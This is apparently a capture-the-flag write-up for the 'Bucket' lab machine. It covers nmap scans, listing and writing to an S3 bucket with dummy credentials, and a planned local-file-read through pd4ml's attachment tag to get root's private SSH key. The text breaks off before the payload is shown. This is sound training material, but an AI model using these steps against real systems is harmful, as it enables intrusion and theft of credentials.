$ nmap -p- --min-rate 4000 10.129.65.220
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-25 21:28 +08
Nmap scan report for 10.129.65.220
Host is up (0.0070s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Did a detailed scan as well:
$ nmap -p 80 -sC -sV --min-rate 4000 10.129.65.220
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-25 21:29 +08
Nmap scan report for 10.129.65.220
Host is up (0.0065s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1
We can add bucket.htb to our /etc/hosts file to visit the web application.
Web Enum -> S3 Bucket Shell Upload
The website was looked to be a custom platform:
When I looked through the page source, I could see that there was a subdomain present:
It seems that this uses the AWS S3 Bucket to store images on the website. When we add the subdomain to the /etc/hosts file, we can see that images are loaded:
S3 Bucket is a cloud storage provider for objects, and it too can have misconfigurations. We only know that the bucket for the web application is called adserver. However, it's unlikely this bucket is actually publicly listed (at least I don't think so).
To enumerate this, we can use the --endpoint-url flag with aws to specify where we send the requests.
$ sudo aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver
Unable to locate credentials. You can configure credentials by running "aws configure".
It seems that we need credentials. Based on Hacktricks Cloud, it is possible for unauthenticated access with null credentials.
$ sudo aws configure
AWS Access Key ID [None]: test123
AWS Secret Access Key [None]: test123
Default region name [None]:
Default output format [None]:
$ sudo aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver
PRE images/
2023-08-25 21:43:04 5344 index.html
Great! We now have access to the files within the S3 Bucket instance. We can try to write files to the instance, and find that it works:
roy can read this. The user had a few files within their directory:
www-data@bucket:/home/roy$ ls -la
total 28
drwxr-xr-x 3 roy roy 4096 Sep 24 2020 .
drwxr-xr-x 3 root root 4096 Sep 16 2020 ..
lrwxrwxrwx 1 roy roy 9 Sep 16 2020 .bash_history -> /dev/null
-rw-r--r-- 1 roy roy 220 Sep 16 2020 .bash_logout
-rw-r--r-- 1 roy roy 3771 Sep 16 2020 .bashrc
-rw-r--r-- 1 roy roy 807 Sep 16 2020 .profile
drwxr-xr-x 3 roy roy 4096 Sep 24 2020 project
-r-------- 1 roy roy 33 Aug 25 13:27 user.txt
The db.php file included some code for the DynamoDB instance:
This uses the DynamoDB's alert table, and it takes some data from there that is titled Ransomware and uses pd4ml_demo.jar to convert the HTML into a PDF. Searching for exploits for the pd4ml.jar program spoiled the box a bit:
Anyways, reading the documentation for it provided me with the <attachment> tags.
We could potentially use this for an LFI to read the private SSH key of root. First, we need to find out where this app is running on. Reading the Apache configuration files gave me just that:
We need to forward port 8000 to our machine. I used chisel, but you can use ssh too since we have the credentials of roy. The application is being run as root as well, confirming that if we can exploit LFI, we can read every file in the machine.
Next, we need to create a new table within the DynamoDB instance with a title and data column. Afterwards, we need to insert 2 key pair values for it, with title being set to Ransomware, and the data field being set to our payload: